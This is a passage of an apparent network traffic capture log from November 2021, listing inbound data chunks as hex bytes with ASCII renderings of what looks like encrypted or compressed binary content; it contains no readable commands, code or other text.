7c 86 25 d0 54 10 89 aa b2 8e 4c 27 0c 3f d2 c8 80 34 31 9d 54 48 92 85 33 05 a1 4d 61 ca bb 86 52 80 53 90 0d 94 72 Data Ascii: dp\|>}>D(WA.PR)ud:bebmC<(!L\|5[F~t?ZBn.8- M/ H9lr^{lNxz6I7qi,GoW7},FZq1DCK{[1\|%TL'?41TH3MaRSr
2021-11-22 13:07:59 UTC	144	IN	Data Raw: 98 a6 75 43 c5 fa b5 6d 4e 1f 76 2b ac 8c f6 ac 05 5c 99 f9 ed 50 8d e6 2b 1e f8 68 21 f2 31 8a ad ad cf ea 80 87 19 8d 4e a8 75 8e dd 43 b3 e9 d7 7a dc 47 d8 7f 75 b3 c8 8c 45 7b d8 06 ed 28 ad 71 1f e5 9e 2c 17 4a 86 c8 be c9 56 3f 25 1d e3 de e5 ee 9c 46 ac 1f 7f 35 1d 65 81 27 d3 d1 57 01 f0 17 f4 6a 08 3a bb 12 7f ae 9a 54 57 ee 65 2f 1a c6 f4 2d 32 59 12 1e 2d 37 d2 bf f0 24 86 06 bb 82 b4 c1 34 22 39 2f 99 22 ee 69 22 ab 26 0a 39 6c e5 c4 82 f2 82 fc 4c 47 84 72 2c 9c aa cc 70 a0 f8 8a 20 38 98 22 d4 e3 3b 7b 08 b3 45 51 f7 83 04 5a 1d a0 8d 03 62 fe ee 30 4c 96 35 dc 48 11 c9 bd 97 80 b0 08 c0 13 4e 88 ac 5e 78 69 44 54 43 fa 5c 35 ba 1f 01 c3 f0 a9 e3 c7 2c 22 59 93 d7 10 1f 5a 2e 1e 5a 72 cf 14 f5 3c 79 87 1e 18 53 aa c6 b4 fe 1a 86 bd 93 fa e5 Data Ascii: uCmNv+\P+h!1NuCzGuE{(q,JV?%F5e'Wj:TWe/-2Y-7$4"9/"i"&9lLGr,p 8";{EQZb0L5HN^xiDTC\5,"YZ.Zr<yS
2021-11-22 13:07:59 UTC	146	IN	Data Raw: e1 40 1c 48 52 02 62 13 97 f0 e4 b0 57 1f 04 ba c9 12 0c 5c a2 10 ab ab 2f 20 f2 f5 01 9e a1 07 7a 5d 5c db 85 4e dc 12 32 52 50 b4 a1 23 ae 50 b4 ad a4 c9 16 15 94 24 d7 71 69 a3 f9 ba 08 0a fa 71 fe a5 8d 36 c1 64 57 ab 50 7e e6 91 17 f1 04 95 38 b4 cf d8 3f 88 6c d2 e4 71 31 34 0d 94 d2 d1 ce 69 66 d6 5b 66 50 99 4f fb af 08 d6 74 9d a1 2c cc 8d 68 0a 19 39 b3 41 82 34 ab 98 13 7c b4 a5 6f 2f 8c 4f 41 2b b0 00 2c 06 5c b8 24 b6 fe fa ba d1 c4 93 14 a3 b9 88 65 6a c0 11 1a 9e 5d 3d aa 90 48 d3 06 Data Ascii: @HRbW\/ z]\N2RP#P$qiq6dWP~8?lq14if[fPOt,h9A4\|o/OA+,\$ej]=H
2021-11-22 13:07:59 UTC	146	IN	Data Raw: 22 4d e2 56 95 ff 26 76 ee ab fe 59 4b 6b c0 bc 6b 88 8b 5e 26 cb b8 5f d4 b6 f1 e7 68 0d 62 3e 10 21 e4 b4 3a 9b 8d 18 bf a5 8c ca 50 26 22 5d 77 7c 87 a6 f7 f1 1b 5a 1f d8 9a c5 80 50 3d 7a 2f 40 5a bc 13 ba 87 13 37 92 59 0d 4f 31 a1 18 a0 82 77 62 7d 37 3e 64 6f f9 db 75 16 c9 b4 f0 01 39 18 52 b0 c4 2b 03 7d 9b eb 6f f8 8f 20 74 d7 e4 20 60 4e 3d 84 d5 42 bc de d7 d8 4d 45 16 c1 19 d6 c6 3a c5 fd 6d 7a 10 1d ad 91 78 fd 32 91 db 17 bb 1a 7d f1 df 30 03 56 25 cc 48 19 4d 40 69 37 4b 1a 48 b7 ec 50 11 d1 17 94 ab a5 b7 5b 41 ce 89 54 71 8c c4 4a 43 9b 95 7b 11 d1 4c 19 da 9e c7 77 5b ed 4d 92 40 59 13 d4 34 37 8d f6 88 d2 ec 9b f9 f0 e2 85 c9 3a 3e f2 7d 5d 6b 30 aa 19 ab ad e8 97 af ae aa 63 bc 79 2c c1 d8 b2 e9 f3 a4 6b 45 d8 60 e3 be c8 9f 63 5d 66 Data Ascii: "MV&vYKkk^&_hb>!:P&"]w\|ZP=z/@Z7YO1wb}7>dou9R+}o t `N=BME:mzx2}0V%HM@i7KHP[ATqJC{Lw[M@Y47:>}]k0cy,kE`c]f
2021-11-22 13:07:59 UTC	147	IN	Data Raw: 1c 5a 01 1d 91 56 88 a9 80 06 09 06 88 05 00 ad 96 7c 0c 95 0f 49 70 b3 81 d9 0a 43 ee 08 ce 5c 2b 4a e6 b9 b8 9a 1b a2 26 02 3f 61 94 a8 85 0b 76 ad e8 0f 0c 76 2c 07 3b 63 a0 05 14 b7 4b c6 66 9d 65 c3 1f d7 e1 d7 c3 e0 5f 52 da ad 6a 5b 6d ed ef fe ad 54 93 2d 20 42 50 5f db 13 7f d9 6d f5 b8 90 0e fa 6c 24 92 5b 09 3e ae f6 0e 9e 45 aa 8d 2a c5 c8 0e 65 b9 db c3 d0 8a d7 04 e4 52 94 fe 82 03 80 45 95 36 d4 ff 91 aa 81 f3 43 71 de 75 e1 3a e6 1e fd dc df a1 09 b8 84 53 57 3e 3e b7 3c c0 16 d4 01 0f 24 0d aa 13 4e 7a ea db 4f 1a d6 13 3e 14 64 bc ab b5 32 17 53 b6 4d 13 4f e1 40 1c 48 52 06 62 13 97 f0 e4 b0 65 1f 04 ba c9 12 0c 5f a2 10 99 ab 2f 20 f2 5c 00 9e a1 06 5b 58 73 d9 83 62 70 ea d5 ca 51 b0 85 8a 17 52 b4 37 1b c1 29 21 92 8d 6e 73 69 83 82 Data Ascii: ZV\|IpC\+J&?avv,;cKfe_Rj[mT- BP_ml$[>E*eRE6Cqu:SW>><$NzO>d2SMO@HRbe_/ \[XsbpQR7)!nsi
2021-11-22 13:07:59 UTC	148	IN	Data Raw: 86 0c 79 45 e6 26 4a 52 66 30 c5 64 98 6e 0e da 4d 65 27 c2 34 c4 f8 32 33 fd 6d 7c 1a 8f f8 08 79 e2 3c 99 67 17 bb 1c cd 52 8c b8 24 76 b0 ee 94 1b 6d ed d5 12 66 1f 46 ba 32 52 17 fb b5 f0 19 a4 b7 40 45 74 a6 56 71 10 cb e1 2c 24 b4 e9 17 f1 91 3b 74 b8 5d 52 6e d7 46 b0 9d 5d 39 56 6a 90 a7 f6 8c ed 76 b1 d4 f2 78 a6 ce ad 66 4b ef 5f 6f 10 54 ab 8d ad 72 a5 aa 91 8e 43 64 51 ae bf 61 f4 c2 f7 84 e0 4c f0 4d 7b 9b e3 a4 c3 03 6b 81 93 b5 8c ae 19 c5 fd b4 32 67 0e cb b3 04 72 1f 46 3f b1 f5 c5 e4 a7 49 84 2d 6b 1d 36 4d 07 5f 60 52 29 9c d1 f7 f2 4a 6c a2 9e 3f f7 ad 97 a5 73 ce 01 0d 7b ed d4 0d 09 55 3a 24 07 1a d6 95 70 70 9d 79 22 87 94 24 16 47 3b b5 bc 95 d9 62 13 6c 04 6f 3b 4c 88 cf a3 d6 9d d8 73 42 ab 70 2a b0 02 34 97 38 f9 8e 04 fa fc 20 Data Ascii: yE&JRf0dnMe'423m\|y<gR$vmfF2R@EtVq,$;t]RnF]9VjvxfK_oTrCdQaLM{k2grF?I-k6M_`R)Jl?s{U:$ppy"$G;blo;LsBp*48
2021-11-22 13:07:59 UTC	150	IN	Data Raw: 6c 0b bb 7a 8c ad 82 cd e0 23 47 64 fa e9 52 eb 47 2d c9 54 b4 fa ab 81 fe 46 b1 1b c1 f9 09 aa 82 f3 d9 74 e1 49 c7 1a 40 34 d0 de ff 41 04 3e fa d4 7e 13 38 97 39 e9 90 aa 02 2b 09 1b ac 8a 4f 79 ea 41 4a 2d e9 35 1e b2 77 94 86 97 dc 36 79 30 2c 86 66 cc 46 3c 4a 7b 80 1c 10 b3 dd f2 b6 ff 19 07 ba 53 17 0a 60 84 30 3c b8 07 0d d0 a6 21 b4 27 67 cb 71 5e df a3 61 59 6c ab c9 75 9d 93 8c 8c 55 b7 37 81 c4 38 1e b4 ad ca 7e 41 ae a0 9c 0e 20 63 06 4f 89 8f 32 e7 48 d6 d5 c9 e5 c3 b8 25 5d 26 93 3b 2e ea d5 65 83 4c 58 f9 7e 19 39 6b b2 d4 fb 50 3f d2 d5 5b 64 5a 1c 32 62 ae 92 f7 79 07 85 0c cb 14 4d 27 28 45 be ca 80 2a 83 95 7b 5a b2 8f f0 79 38 4c 41 29 ba 8e 51 9f 5d 22 05 bb 63 de 9a d9 5d b6 39 91 fd 85 e9 68 dc 39 17 ed 7b 3b 80 09 38 62 2a 20 49 Data Ascii: lz#GdRG-TFtI@4A>~89+OyAJ-5w6y0,fF<J{S`0<!'gq^aYluU78~A cO2H%]&;.eLX~9kP?[dZ2byM'(E{Zy8LA)Q]"c]9h9{;8b I
2021-11-22 13:07:59 UTC	151	IN	Data Raw: c5 f9 3a 4c 91 a9 e4 62 45 67 47 05 75 5c 55 75 b3 79 e3 63 02 ab 4b 0f 40 69 13 d4 4a a5 dd 38 27 06 cc bf 79 08 5f 3a 26 b8 8d 4c 45 b9 81 df 8a 74 0f 59 f3 83 de 8a 75 5e 59 41 1d a1 1f a7 d6 82 be f6 01 be 16 ff 9e 39 53 9e 48 e0 d0 83 0a bd 50 36 10 fc cd 79 b1 9c e0 86 8f 40 58 58 51 4a 4f 16 87 f2 a7 63 6f 17 4b e6 a1 95 59 14 68 2f cc fe 95 18 3c 87 1e 33 7a 0b 82 d2 e6 b7 ea 84 33 15 de 5f 45 e8 ea 22 50 7e b6 fb 50 63 db 1c 84 bc 9d 2a 50 98 0d 1c fd 92 4f 7a 1c d6 ab 02 35 f0 f4 2d 73 97 20 9e 49 88 a1 39 d5 de 88 3b b7 13 48 8c 22 7f 02 42 76 53 0a 8a 35 34 86 39 1d ed df bd eb c1 0c 5c 3a a0 5a 63 e5 25 23 07 6a 72 be 0d f4 d0 4a 9a 3d e6 bd 19 1e 20 71 d8 7e 4c 10 7a 09 2f 20 10 9c 61 0c 96 62 d6 7e 88 86 c1 3c 3e 70 9e d2 a5 42 41 7b 4b a7 Data Ascii: :LbEgGu\UuycK@iJ8'y_:&LEtYu^YA9SHP6y@XXQJOcoKYh/<3z3_E"P~Pc*POz5-s I9;H"BvS549\:Zc%#jrJ= q~Lz/ ab~<>pBA{K
2021-11-22 13:07:59 UTC	152	IN	Data Raw: e8 e8 14 25 b8 13 3b ab f5 f3 c0 4d 28 cf fe d3 13 f4 e0 18 28 17 1b fa 14 9e 2f 53 a5 90 2a 3d 56 f2 fd 3b 0c 12 95 94 7d d5 69 2f 0f b9 54 cd 54 45 5c f6 54 39 8b d6 89 26 97 88 6c 56 9a 0a cb db 70 34 68 59 06 c8 ad 8a 9a 01 18 95 14 23 31 13 36 2b f8 44 9b 0c 5d ef 44 ac 68 47 36 1e 08 87 df aa 6a d0 d4 05 3b d9 c5 15 3e 81 1c 26 59 ed f4 27 f6 21 9b 1e c8 1e 95 c4 ab 2d c6 5b cf e4 d3 b9 23 fd 2a 18 ba 42 23 ad 9e 48 fb 20 22 13 d1 67 1b 8a b1 66 e3 b7 99 e7 4a 6b dd 39 5a b0 98 5b 22 60 c9 41 cc 85 c3 e2 59 28 5d 02 1e 2a cc 9c 06 85 12 56 1c 97 a1 e5 4e 9d 5f 68 4f df 99 6b 23 4f a1 42 c3 25 5c 17 db b7 f5 b0 b9 9f b2 44 da 7b 55 e2 24 33 12 d3 9e e0 42 4f 74 44 a6 19 ba fc c5 ad a9 9e 64 c6 d5 0e f2 31 ef d1 a4 83 69 33 db f6 a9 e2 6d 4b 00 6f d2 Data Ascii: %;M((/S=V;}i/TTE\T9&lVp4hY#16+D]DhG6j;>&Y'!-[#B#H "gfJk9Z["`AY(]*VN_hOk#OB%\D{U$3BOtDd1i3mKo
2021-11-22 13:07:59 UTC	154	IN	Data Raw: 4e d6 86 af b3 07 3d 1d d0 a8 14 a3 d6 ce 87 08 1b 5f 79 21 09 ad 8c 51 cc ae 6a 27 ad f9 86 48 3b 8c fb 10 95 6b 5c 03 a9 92 1b 25 35 cb 95 08 56 21 9f e9 41 74 f6 e0 01 3e f7 39 9c 66 85 ef 74 c4 c9 b8 27 f1 4f 16 cb 22 2d 30 1f 05 0f 17 d5 73 08 a8 52 44 f4 c0 96 f1 94 72 0e 3a 9c 60 17 f5 28 48 37 56 6d b4 6d 95 93 55 ae 08 38 6f 90 8a fa ac 69 b4 99 c3 ab bc b7 e5 e6 0f ba 87 1b a5 5b 88 40 10 4c bf d8 ba 44 6a 03 f0 a1 82 b8 2a 6e 78 c2 92 a9 8e f1 ee 4b 4f ba 3d 40 3a f7 0f 37 88 f8 4a 1f d9 af ef 19 b0 67 c3 0e b4 69 ea ef 38 38 0e aa d3 e2 90 ac 63 34 46 6b a2 d9 d9 6b 92 d9 89 24 e2 b2 eb 6a c8 dc 49 e2 2d ac ff f9 aa a0 75 47 41 c2 04 bb fe ed 32 e0 af 92 60 f5 13 02 eb 44 0e fe a2 fb 90 7e b9 fa 43 a4 50 bc 60 1b 69 b0 e4 76 38 de a6 34 a2 e4 Data Ascii: N=_y!Qj'H;k\%5V!At>9ft'O"-0sRDr:`(H7VmmU8oi[@LDj*nxKO=@:7Jgi88c4Fkk$jI-uGA2`D~CP`iv84
2021-11-22 13:07:59 UTC	155	IN	Data Raw: 56 ff b5 c6 0e 2e ee 33 e3 44 ae 30 c0 4a 07 62 d5 2e 83 f8 d5 ec e0 15 9b 5c 63 a8 7a 78 e5 ca 13 a6 7e 6e 13 b8 1a 46 db fa 68 e6 be c6 cb 55 63 dd 31 18 ea f4 17 69 3c da 26 8a d9 e1 a7 07 64 59 69 43 63 9f f1 6e c1 70 12 5a 97 d8 be 12 de 68 0f 72 e2 ad 8e ee e4 14 d1 0d d4 97 e1 2f 44 2a 7a 38 0e 4e 89 1b a4 a1 28 a8 f8 d9 13 4a 0f 94 88 87 bb 72 d8 78 3a 11 3d 4b 04 d8 02 65 9e 6e be 6b 54 63 12 ee ad 43 1b 43 67 fd e5 ed ed 5d 32 db 7c ba 8d 42 81 30 2f f4 7a db 23 17 84 a5 77 2a d1 4e 34 c9 34 36 a2 ab a9 61 0d ca ab 7a c0 78 85 a8 06 ad 51 75 47 94 e7 ce 18 7c 8d ac d8 5a 95 9d e3 a6 d2 30 43 fa bc 53 3c 38 e1 03 60 80 bf e3 0b d4 fa 95 7b f6 91 0a 31 6d d4 65 c8 b0 fc 37 51 fb d8 19 de 10 d6 cb ad ce c9 33 18 50 76 0f 82 12 04 0f f1 52 0a a8 ef Data Ascii: V.3D0Jb.\czx~nFhUc1i<&dYiCcnpZhr/Dz8N(Jrx:=KenkTcCCg]2\|B0/z#wN446azxQuG\|Z0CS<8`{1me7Q3PvR
2021-11-22 13:07:59 UTC	156	IN	Data Raw: 54 61 3b 84 86 e0 be 32 f5 df d7 b5 b5 bb bb 8c 1c ee be 18 e0 12 ca 1f 49 77 e8 a5 dc 3e 6c 57 ab fc cf f5 2c 51 6a d8 83 e7 c0 ff ba 1c 69 c5 11 46 34 ab 56 40 8b 8f 57 39 8d dd fd 2b 64 e9 02 ca 7f f6 7f 44 98 f3 83 6f 5f 67 25 68 de e1 d7 b5 7b 0d 37 e9 1b 0e 55 e6 3b 16 5b df 0d 19 93 5b ce 62 3d 2c 68 75 fd c0 db 43 e5 64 67 7f a0 68 65 7a ee 68 de 88 68 82 db 9d 84 99 9c 29 f4 a3 2b b9 1d ed 3c 41 34 ba e4 7b 32 ec f4 71 bf e3 33 cd 11 36 05 1c 1e c9 84 8b 05 14 29 7a 22 d3 34 ba 65 19 5a 62 26 28 73 c7 2f 21 82 69 6c 00 31 a8 04 87 6b a4 e7 a3 41 43 67 ca 98 3b 0a d2 e6 94 ad 08 ab 6d 04 3d 0d 9c ad 90 00 31 8e ae 39 98 b0 9b 54 a0 8a 36 e6 18 14 2f 76 8d f1 0e ef 82 d7 69 f1 ac ec ce 24 a2 35 3c 4c 4d 3c 62 a3 b5 06 f6 88 83 c6 20 84 7a f1 70 66 Data Ascii: Ta;2Iw>lW,QjiF4V@W9+dDo_g%h{7U;[[b=,huCdghezhh)+<A4{2q36)z"4eZb&(s/!il1kACg;m=19T6/vi$5<LM<b zpf
2021-11-22 13:07:59 UTC	157	IN	Data Raw: c9 04 55 51 eb f2 ce b2 44 84 34 6b 5f 35 21 02 ba 4f 2f dc 75 af 6b 54 67 09 f2 b0 06 45 2f 6b e5 8b 82 b9 1c 51 4f fa 3b 4a ed 2a 96 e7 69 93 4c df c9 17 2c eb ae 3b ef c3 19 f5 fe 74 79 29 9b fb 2c 46 df 1d 93 24 19 98 39 cb f2 d1 14 3f 6d a3 e6 73 30 41 f2 45 38 4b 13 5e a0 db 6f 35 8c f3 91 a8 53 59 97 b9 9c 55 90 a7 d0 32 9a a5 6f 78 2f c2 4a b7 ef a4 69 1e a9 85 2a fa 0f 8e 85 e1 df 90 44 77 0c 75 12 81 70 45 4f d7 71 03 df ef 20 1b b6 97 97 28 78 70 5d 1f 2d 2b 3d 70 95 43 a3 7a 07 c4 3b 75 6c 2e 46 f5 5a f0 e8 19 63 1e c1 db 40 08 19 38 3a f9 85 5f 52 89 b5 e3 ad 4d 36 4d e8 be fb b4 5f 4e 7f 55 24 e0 19 b6 80 b0 9b d4 12 b6 73 d9 a3 0d 68 95 74 de ea bd 33 80 64 f1 cc 3a 1c dd 65 64 4e a9 98 49 52 36 63 7d 41 44 8f ee a1 57 78 36 7a d0 f3 90 61 Data Ascii: UQD4k_5!O/ukTgE/kQO;JiL,;ty),F$9?ms0AE8K^o5SYU2ox/JiDwupEOq (xp]-+=pCz;ul.FZc@8:_RM6M_NU$sht3d:edNIR6c}ADWx6za
2021-11-22 13:07:59 UTC	159	IN	Data Raw: 21 3d 2e ed 3b 28 3e 88 03 bc e8 1e 8b fa 1c 5a 5a 58 d1 29 6a d5 65 d6 32 c2 b9 c4 4e 07 88 c7 26 10 96 50 0c 9c 73 a9 9f bb ee d1 2a 6b 59 c5 ed ee bd c0 2e ec 63 bd d9 83 bc f8 c1 a3 17 e3 e1 1c 99 83 d2 ec 73 cc 56 e4 0a 8c d2 36 00 25 89 e0 79 43 a6 94 f7 c3 4f dd 1a 78 43 65 f9 ce e9 63 44 bb 9b 06 a3 b3 e6 04 f7 f5 54 8b 69 64 7f 22 d2 b7 5a aa c2 a7 24 be f4 b5 8a 74 d9 42 3a 42 4c 44 23 f5 f8 4d ad cf e4 c6 1b b0 96 14 b4 a3 4d 25 a3 1b 1c a3 d8 f5 d2 4d 24 c0 f5 fb 26 db d8 23 1e 09 29 c9 31 a6 28 7e bd 94 1a 11 7b d0 84 07 08 30 ac bf 7e fa 7c 2a 39 8f 77 fc 56 64 75 c4 59 19 ba fb b8 33 99 71 a0 b1 54 f4 0c 06 ae 0f 42 46 27 f3 87 94 9a 5b 36 85 0e 3b 36 07 24 28 a5 0e ca 3e 67 f8 61 ab 7d 2c 42 5a 7d fe ae ee 6b f7 f8 1c 3e df d5 06 68 ca 08 Data Ascii: !=.;(>ZZX)je2N&PskY.csV6%yCOxCecDTid"Z$tB:BLD#MM%M$&#)1(~{0~\|9wVduY3qTBF'[6;6$(>ga},BZ}k>h
2021-11-22 13:07:59 UTC	160	IN	Data Raw: f4 6d 52 b3 ee d0 09 cc 56 36 7a 96 d0 66 46 d2 4b b4 47 7c 04 7f 77 85 e3 f3 af c4 59 ab d6 d3 4b c4 e0 12 20 ef c4 72 68 08 b6 8f bf a1 d8 b5 b3 b8 88 a7 65 d5 6d 62 81 71 6a 7f 05 2a 95 1b b5 b3 5f 32 50 df fe 6e 17 01 26 21 eb 89 5a 61 bb d3 9e e5 15 6c 3d 8c f4 e8 a8 43 75 6b 4f 01 e8 0a d5 81 ef de 9f 6b db 45 87 d5 7f 04 f4 08 b8 8c 8d 10 9a 6e 07 2a d9 a1 42 91 bc 9b 5e 0c d6 96 d5 8b 86 c3 df 5d 34 78 9a 98 ec ec 4e 6d 41 94 c0 98 8a 36 4f 39 ef 9e 34 a5 92 c7 82 47 42 13 72 66 74 e2 d0 16 dd 99 67 10 eb b1 9f 5c 38 82 ed f9 68 93 a4 f9 14 7b f8 61 2a dc cc 13 5d 34 d4 b3 15 35 f8 f8 7b 3b c0 7f 8c 36 fd ea 76 db d6 d6 42 c6 76 6e ff 57 1a 75 5b 23 44 12 bd 69 01 c3 19 0f 9e df 9f 92 c6 08 77 7e 9d 06 3b d1 0a 01 37 3a 36 cd 1f ea 9c 57 bd 04 76 Data Ascii: mRV6zfFKG\|wYK rhembqj_2Pn&!Zal=CukOkEnB^]4xNmA6O94GBrftg\8h{a*]45{;6vBvnWu[#Diw~;7:6Wv
2021-11-22 13:07:59 UTC	161	IN	Data Raw: 11 a7 8f b9 ac 42 4d be 70 2f 55 f9 6b 2f 56 42 be 30 a3 a1 d1 f3 ae e7 2c 39 88 8c ee e8 90 43 f0 e1 4d dd c6 1c 66 e3 55 60 d8 a5 aa 85 23 59 bf 94 b4 6a 93 d8 34 01 7f 7d d6 0d d8 24 58 e9 8a 59 0d 63 c5 8a 35 09 7a bd b7 1d ce 7b 22 21 cf 3f e0 23 24 6f db 43 63 f4 87 82 33 b7 aa 70 69 f8 0a c0 c8 72 f1 b9 90 e8 24 67 4c 7d d1 db 18 95 c2 ca 89 b2 f6 1a 90 47 d3 b8 3b 81 77 b0 e3 87 8b a8 3d 68 24 80 0e 4f 85 b4 0c 49 cf ba 53 a2 a8 cd 2f 7b b7 2c ec 59 d8 84 38 b1 f1 d2 12 af 71 a2 8e bc ff 2a d2 56 26 e3 38 37 a3 81 49 f1 27 27 48 e5 0f 40 c4 e0 27 88 c1 a2 fd 03 26 fc 1b 7c 96 a9 49 30 73 9e 6b e0 b5 a3 f8 5e 5a 00 46 42 33 d6 d3 4f d4 6c 1a 23 a1 c4 95 32 e7 22 51 61 ec b4 8f a3 d2 26 c5 02 8e 8d ee 0f 6c 33 2e 17 48 69 8e 08 ba d5 28 9e d3 e9 27 Data Ascii: BMp/Uk/VB0,9CMfU`#Yj4}$XYc5z{"!?#$oCc3pir$gL}G;w=h$OIS/{,Y8q*V&87I''H@'&\|I0sk^ZFB3Ol#2"Qa&l3.Hi('
2021-11-22 13:07:59 UTC	162	IN	Data Raw: d4 bf ea 40 6c d1 aa 9e e2 8d b7 97 61 66 1b 2b 1a 3d c4 75 30 5f 12 60 14 28 f6 b9 f6 d6 16 00 04 85 b4 45 01 ef 21 29 99 42 e8 ec 29 8b 06 7d 33 f3 f1 f6 a3 ba a1 29 72 7d a9 fa 06 01 a5 4c 0e 35 e6 22 3e 1e fe 31 e7 81 a1 4c 25 43 41 64 bc 93 04 33 32 97 84 05 62 b8 d7 78 7c 92 35 b0 4c 3b ad 32 96 e0 a8 e1 8f 03 4e a4 15 ae 7c 72 62 46 0e a9 7a 33 9a eb 16 99 f4 b5 cb 23 0e 78 5b bf 51 54 8a 01 2a 1c 7a 46 db 4e f1 b4 5c d4 00 a5 56 c8 c4 41 f8 6b 90 9f 93 7e dd b6 e0 dd 4f 58 f6 29 bf 4f 94 64 4d a9 b5 ca a0 ae 28 7a f1 92 a3 c2 47 c8 31 b7 e2 62 b9 28 86 2a 2b 8a 38 88 03 92 7c 20 95 e7 73 76 b3 16 f4 00 73 ea 08 eb 59 01 2e 6d b8 28 b1 2e 3a 36 02 77 eb a4 a8 92 2d 17 02 b0 0b 0a 56 47 01 61 67 ab 2d ad 9a 5e ed 5e 1f 59 51 0b fa f7 f7 48 ca 4a 7f Data Ascii: @laf+=u0_`(E!)B)}3)r}L5">1L%CAd32bx\|5L;2N\|rbFz3#x[QTzFN\VAk~OX)OdM(zG1b(+8\| svsY.m(.:6w-VGag-^^YQHJ
2021-11-22 13:07:59 UTC	164	IN	Data Raw: c8 53 4b 77 75 75 57 09 31 d5 80 1d ff 46 16 4b 0b 3a 3d 5f 27 a7 10 65 e0 92 34 da b7 8f 70 b2 a5 5c 07 09 57 47 2d 8d a9 cd 8b 4f b8 fe be 67 d5 bc d1 84 b7 91 ab 99 a8 33 76 68 0b 28 ef 07 23 f0 8b 40 fb ed 3b 17 e0 6e 13 7e a6 5a f2 bd de 50 43 46 dc 20 4e 6c b8 22 02 40 ba 4f d5 3e 94 d3 68 20 53 3d 15 0a e6 bd 3c 92 38 60 26 5b 8c ed 43 b2 20 61 5d a4 8c 91 e5 a5 26 96 33 c2 9a e4 12 34 13 7c 30 ca 72 e0 16 bc 81 9c ad cf f3 0a 4f 08 a6 b5 bf 84 77 82 7a b2 35 44 4f a0 f8 56 25 ef 1e ff 00 1a 3c 68 9d 7d 3a 00 4e 1f 95 4f f2 27 3e 52 47 f5 32 18 f2 1e a9 57 76 e4 68 d3 d8 5b 74 8f c1 19 d6 de 12 d5 fe 6d 7c 3a 9f d2 08 78 fd 36 b1 4a 15 2c 1b 70 d5 f7 21 24 76 b5 ce 48 19 6d ed 43 30 dc 0c 75 9a ef 50 15 fb 95 eb 22 a4 73 5e f6 5d 96 54 70 16 e2 67 Data Ascii: SKwuuW1FK:=_'e4p\WG-Og3vh(#@;n~ZPCF Nl"@O>h S=<8`&[C a]&34\|0rOwz5DOV%<h}:NO'>RG2Wvh[tm\|:x6J,p!$vHmC0uP"s^]Tpg
2021-11-22 13:07:59 UTC	165	IN	Data Raw: 79 50 79 62 74 02 ca 5c 35 87 33 b5 c2 d2 b1 c9 ea 2e 22 bf b9 51 6e 9b 5b ba 1b 51 18 cd 15 f5 a6 aa ab 9b 3f 6e c2 53 b5 d2 38 b6 99 81 fa 41 ec 0a ef 52 be 52 4a 92 4b 87 46 5e 01 af c0 a3 45 71 29 4d 85 e7 80 6a 01 8e b0 a8 8a 98 80 0b 2d 79 9a 12 20 8e 95 26 0c 84 c5 f9 71 d1 9e c5 22 f9 ed e8 c9 67 a9 a3 7e b1 ba 8f 3b 80 25 0f 3d ea b1 12 95 3d 54 09 ea 03 0b 5b f9 31 3b a7 b8 20 3b a4 4b cc 4b 0f 19 4b 1e 13 e4 e7 77 f3 5f 10 47 85 45 5b 4b 5a 58 ef af 45 b3 b5 00 52 52 57 f3 c8 7c d4 69 ce 3e 2d 90 f6 6e 31 b2 84 09 33 ac 7d 2b 45 56 9c af 8c c7 0b 09 55 66 ed c3 b8 97 ce 2e d8 50 65 f1 b8 83 ef dc 0b 34 c0 dd 38 a8 a4 e7 c9 56 e2 64 0e 18 4e 1e ec dc 0e 4e 23 ba 95 4d 73 14 2f b5 2b ea fd be 88 0c 35 09 15 a8 41 78 fb 41 fd 36 d2 37 0f ad f1 bd Data Ascii: yPybt\53."Qn[Q?nS8ARRJKF^Eq)Mj-y &q"g~;%==T[1; ;KKKw_GE[KZXERRW\|i>-n13}+EVUf.Pe48VdNN#Ms/+5AxA67
2021-11-22 13:07:59 UTC	166	IN	Data Raw: 61 35 bb 8a ce e7 a9 33 42 71 e6 35 8a d0 d5 3d d4 8a d9 89 fa 13 76 aa 7b 20 57 74 91 1d bd 91 3b b3 ec 04 0d 5f 37 87 97 ae 85 64 e7 5e 1a 6d 45 5f 74 d8 75 81 e8 99 f7 00 39 98 7b 8e c4 2a 05 c0 18 19 d7 d8 8f b3 55 d6 c7 01 60 43 19 3f e5 45 9c d9 d4 43 6c 63 bd 70 18 db dc 13 e8 f3 6a 71 38 b9 d3 9f 78 ed 34 97 4a 82 ba 09 e5 f2 f2 b6 24 7b b6 ed 48 8e 6c a6 4d 36 4b 9a 61 ab cd 51 17 f7 92 db 11 a5 b7 c8 60 ca aa 55 71 1a e6 f1 73 bc b5 7e 12 9a 4e 3f 74 2f c6 7a 41 c4 60 07 41 4c 3b 57 4a a2 8b e5 8e f4 7f 0e f8 c6 5b a1 e4 27 1f df ec 5e 6b f4 8b a4 8f ab ee 12 81 90 aa 35 3a c4 af 07 62 e5 69 fb 83 47 64 8e e0 bd 9a 5d ad 43 7b 60 86 80 b3 fa f1 8c c4 40 0d 41 ca 10 ea 2e f8 26 9f 82 1e 5e fd c3 e2 2a 40 bf 02 3f 9d a7 66 43 02 af d3 25 9f 33 34 Data Ascii: a53Bq5=v{ Wt;_7d^mE_tu9{U`C?EClcpjq8x4J${HlM6KaQ`Uqs~N?t/zA`AL;WJ['^k5:biGd]C{`@A.&^@?fC%34
2021-11-22 13:07:59 UTC	168	IN	Data Raw: 17 10 23 3f fb b1 85 87 25 81 3d 5c 0f 0d 56 97 01 3b 63 b9 2d 7f b7 d0 e8 68 1e 1a 5a b6 f6 e5 f7 75 e2 19 50 75 82 69 4b 49 cd 85 dd ad 54 b3 f7 84 42 c7 47 cc 3f 7f d9 7f fd 3e ee 97 fb 2a 22 c6 f9 42 3f ac 6c 63 91 57 8c ad 9d d6 c8 99 44 05 fd c1 d0 0d fc 2c c9 50 94 f9 a8 16 ff b2 95 34 d0 6b 0b a8 81 f3 d9 52 eb 79 e2 09 5e 1e fd 60 dd 47 2e b8 84 4e 77 36 36 27 3a e8 90 1e ba 0e 24 09 8a ac 54 67 cf 52 6a 35 c4 2d 3d ad 66 bc ab 84 c4 13 76 30 52 1d 67 cc 42 1c 4e f8 80 0a aa 01 f1 81 92 dd 1d 04 ba 53 37 a1 4d 92 10 b4 a8 47 22 d0 a6 cb ba a1 19 52 70 4f d3 5c 44 2f 6e a8 53 70 95 81 aa 8c 50 a5 3f 69 c4 84 31 b7 ad 11 54 69 83 a2 9c 19 02 4e 6f 5a 8a 8c 36 3f 6b d5 d5 e9 7f f7 9d 83 6c 91 97 3b 2e 7a d3 2e ae 4c 58 f0 71 a6 15 c0 b0 d1 d1 da 66 Data Ascii: 